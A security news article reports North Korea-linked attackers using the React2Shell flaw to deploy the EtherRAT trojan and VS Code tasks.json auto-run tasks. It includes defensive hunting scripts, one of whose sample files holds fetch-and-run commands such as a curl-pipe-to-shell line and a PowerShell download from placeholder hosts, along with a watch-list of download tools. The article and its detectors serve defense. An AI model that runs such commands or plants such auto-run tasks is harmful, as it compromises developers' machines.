North Korean-linked attackers may have become the latest to exploit React2Shell, a recently disclosed critical security flaw in React Server Components (RSC), to deliver a previously undocumented remote access trojan dubbed EtherRAT.
“EtherRAT leverages Ethereum smart contracts for command-and-control (C2) resolution, deploys five independent Linux persistence mechanisms, and downloads its own Node.js runtime from nodejs.org,” Sysdig said in a report published Monday.
The cloud security company said this activity shows significant overlap with a long-running campaign codenamed “Contagious Interview,” which has been observed leveraging the EtherHiding technique to distribute malware since February 2025.
Contagious Interview is the name given to a series of attacks that target blockchain and Web3 developers and others through fake job interviews, coding challenges, and video assessments, leading to the deployment of malware. These efforts typically begin with a ruse to lure victims through platforms like LinkedIn, Upwork, and Fiverr, where the threat actor poses as a recruiter offering lucrative job opportunities.
According to software supply chain security firm Socket, this is one of the most prolific campaigns exploiting the npm ecosystem, highlighting its ability to adapt to JavaScript and cryptocurrency-centric workflows.
The attack chain begins with the exploitation of the maximum-severity RSC vulnerability, CVE-2025-55182 (CVSS score: 10.0), to execute a Base64-encoded shell command that downloads and runs a shell script responsible for deploying the main JavaScript implant.
The shell script is fetched with curl, with wget and python3 as fallbacks. It prepares the environment by downloading Node.js v20.10.0 from nodejs.org, then writes an encrypted blob and an obfuscated JavaScript dropper to disk. Once these steps are complete, it deletes itself to minimize the forensic trail and runs the dropper.
The dropper’s main purpose is to decrypt the EtherRAT payload using a hardcoded key and launch it with the downloaded Node.js binary. The malware is notable for using EtherHiding to retrieve the C2 server URL from an Ethereum smart contract every five minutes, allowing operators to update the URL easily even if the current server is taken down.
“What makes this implementation unique is the use of consensus voting across nine public Ethereum remote procedure call (RPC) endpoints,” Sysdig said. “EtherRAT queries all nine endpoints in parallel, collects the responses, and selects the URLs returned from a large number of endpoints.”
“This consensus mechanism protects against several attack scenarios: a single compromised RPC endpoint cannot redirect bots to a sinkhole, and researchers cannot manipulate rogue RPC nodes to disrupt C2 resolution.”
It is worth noting that similar implementations were previously observed in two npm packages named colortoolsv2 and mimelib2 that were found to distribute downloader malware to developer systems.
Once EtherRAT establishes a connection with a C2 server, it enters a polling loop that runs every 500 milliseconds and interprets responses longer than 10 characters as JavaScript code that is executed on the infected machine. Persistence is achieved using five different methods:
- Systemd user service
- XDG autostart entry
- Cron job
- .bashrc injection
- .profile injection
Using multiple mechanisms, threat actors can ensure malware runs even after a system reboot, allowing continued access to infected systems. Another sign of the malware’s sophistication is its ability to self-update by submitting its own source code to an API endpoint and then overwriting itself with new code received from the C2 server.
It then launches a new process with the updated payload. It’s worth noting here that the C2 returns a functionally identical but different obfuscated version, potentially allowing it to bypass static signature-based detection.
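The five persistence locations listed above are also where a defender can look for this kind of implant. The following hunting script is an added example, not Sysdig's code or anything from the report: it walks the current user's systemd user units, XDG autostart entries, .bashrc, .profile and crontab and flags lines that launch a Node binary from outside the system paths or a script from a hidden or temporary directory; the heuristic, the "benign" path list and the sample unit are assumptions constructed for illustration.

```python
import glob
import subprocess
from pathlib import Path

SYSTEM_NODE = {"node", "/usr/bin/node", "/usr/local/bin/node"}   # assumed-benign Node locations
TEMP_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")

def suspicious_reasons(line: str) -> list[str]:
    """Explain why one persistence line looks like a user-local Node implant (empty if it does not)."""
    line = line.strip()
    if not line or line.startswith("#"):
        return []
    for ch in "=\"'":                 # ExecStart=/x/node "a.js" -> tokens: ExecStart /x/node a.js
        line = line.replace(ch, " ")
    toks, reasons = line.split(), []
    for i, tok in enumerate(toks):
        if tok != "node" and not tok.endswith("/node"):
            continue
        if tok not in SYSTEM_NODE:
            reasons.append(f"node binary outside system paths: {tok}")
        nxt = toks[i + 1] if i + 1 < len(toks) else ""
        if nxt.endswith(".js") and ("/." in nxt or nxt.startswith(TEMP_DIRS)):
            reasons.append(f"script in hidden or temp directory: {nxt}")
    return reasons

def scan_text(source: str, text: str) -> list[tuple]:
    """Scan one artifact's content; returns (source, lineno, line, reasons) per flagged line."""
    return [(source, n, line.strip(), r) for n, line in enumerate(text.splitlines(), 1)
            if (r := suspicious_reasons(line))]

def scan_host() -> list[tuple]:
    """Walk the five locations the article names, for the current user only."""
    home = Path.home()
    files = (glob.glob(str(home / ".config/systemd/user/*.service"))      # systemd user services
             + glob.glob(str(home / ".config/autostart/*.desktop"))       # XDG autostart entries
             + [str(home / ".bashrc"), str(home / ".profile")])           # shell rc injection
    hits = [h for f in files if Path(f).is_file()
            for h in scan_text(f, Path(f).read_text(errors="replace"))]
    try:
        cron = subprocess.run(["crontab", "-l"], capture_output=True, text=True).stdout
    except FileNotFoundError:                                           # no cron on this host
        cron = ""
    return hits + scan_text("crontab", cron)                            # cron job

# Constructed sample unit in the shape such persistence takes; paths are made up, not real IoCs.
SAMPLE_UNIT = """[Service]
ExecStart=/home/dev/.cache/node-v20/bin/node /home/dev/.cache/.update.js
Restart=always
"""
```

Running scan_host() on a live box prints nothing for a clean user profile; each hit carries the file, line number and the reasons it was flagged.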
In addition to the use of EtherHiding, the link to Contagious Interview stems from the overlap between the encrypted loader pattern used by EtherRAT and a known JavaScript information stealer and downloader named BeaverTail.
“EtherRAT represents a major evolution in React2Shell exploitation, moving beyond opportunistic cryptomining and credential theft to persistent, stealth access designed for long-term operation,” Sysdig said.
“Whether this represents North Korean attackers pivoting to new exploitation vectors, or advanced technology borrowed by another threat actor, the result is the same: Defenders are faced with a difficult new implant that resists traditional detection and removal methods.”
Contagious Interview moved from npm to VS Code
This disclosure comes as OpenSourceMalware details a new Contagious Interview variant that prompts victims to clone a malicious repository on GitHub, GitLab, or Bitbucket and launch a project in Microsoft Visual Studio Code (VS Code) as part of a programming challenge.
This relies on VS Code’s tasks.json file, which is configured with runOptions.runOn: ‘folderOpen’ so that the task runs automatically as soon as the project is opened. The task downloads the loader script using curl or wget, depending on the operating system of the compromised host.
On Linux, the loader is a shell script that downloads and runs another shell script named “vscode-bootstrap.sh”, which in turn fetches two more files, “package.json” and “env-setup.js”. The latter acts as a launchpad for BeaverTail and InvisibleFerret.
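A cloned repository can be checked for this auto-run trick before it is opened in VS Code. The following script is an added example, not from OpenSourceMalware's write-up: it parses .vscode/tasks.json (which permits comments, so a plain JSON parser is not enough), returns every task configured with runOptions.runOn set to folderOpen, and notes any download tool named on its command line; the tool watch-list and the sample file are constructed for illustration.

```python
import json

# Downloaders a task has no business invoking on folder open (constructed watch-list).
DOWNLOAD_TOOLS = ("curl", "wget", "Invoke-WebRequest", "iwr", "bitsadmin", "certutil")

def strip_jsonc(text: str) -> str:
    """Drop // and /* */ comments outside string literals; tasks.json is JSONC, not JSON."""
    out, i, n = [], 0, len(text)
    while i < n:
        if text[i] == '"':                           # copy string literals verbatim
            j = i + 1
            while j < n and text[j] != '"':
                j += 2 if text[j] == "\\" else 1
            out.append(text[i:j + 1]); i = j + 1
        elif text.startswith("//", i):               # line comment: skip to end of line
            j = text.find("\n", i); i = n if j < 0 else j
        elif text.startswith("/*", i):               # block comment: skip past */
            j = text.find("*/", i + 2); i = n if j < 0 else j + 2
        else:
            out.append(text[i]); i += 1
    return "".join(out)

def task_text(task: dict) -> str:
    """Flatten top-level command/args plus the windows/linux/osx overrides where a command can hide."""
    nodes = [task] + [task.get(k, {}) for k in ("windows", "linux", "osx")]
    return " ".join(str(x) for nd in nodes for x in [nd.get("command", "")] + list(nd.get("args", []))).strip()

def find_autorun_tasks(jsonc: str) -> list[dict]:
    """Return tasks that fire on folderOpen, with any download tool their command line names."""
    hits = []
    for task in json.loads(strip_jsonc(jsonc)).get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue
        text = task_text(task)
        tools = [t for t in DOWNLOAD_TOOLS if t.lower() in text.lower()]
        hits.append({"label": task.get("label", "?"), "tools": tools, "command": text})
    return hits

# Constructed sample in the shape the article describes; URLs are placeholders, not real IoCs.
SAMPLE_TASKS_JSON = r'''{ "version": "2.0.0",
  // comments are legal here, so json.loads alone would fail
  "tasks": [
    { "label": "setup env", "type": "shell", "runOptions": { "runOn": "folderOpen" },
      "windows": { "command": "powershell", "args": ["-c", "Invoke-WebRequest https://example.invalid/l.ps1 -OutFile l.ps1"] },
      "linux":   { "command": "sh", "args": ["-c", "curl -s https://example.invalid/l.sh | sh"] } },
    { "label": "build", "type": "shell", "command": "npm run build" } ] }'''

if __name__ == "__main__":
    for hit in find_autorun_tasks(SAMPLE_TASKS_JSON):
        print(f"[!] task {hit['label']!r} auto-runs on folderOpen; download tools: {hit['tools']}")
```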
OpenSourceMalware said it has identified 13 different versions of this campaign spread to 27 different GitHub users, as well as 11 different versions of BeaverTail. The oldest repository (‘github(.)com/MentarisHub121/TokenPresaleApp’) dates back to April 22, 2025, and the latest version (‘github(.)com/eferos93/test4’) was created on December 1, 2025.
“North Korean threat actors have flocked to Vercel and are now using it almost exclusively,” the OpenSourceMalware team said. “For unknown reasons, Contagious Interview has stopped using Fly.io, Platform.sh, Render, and other hosting providers.”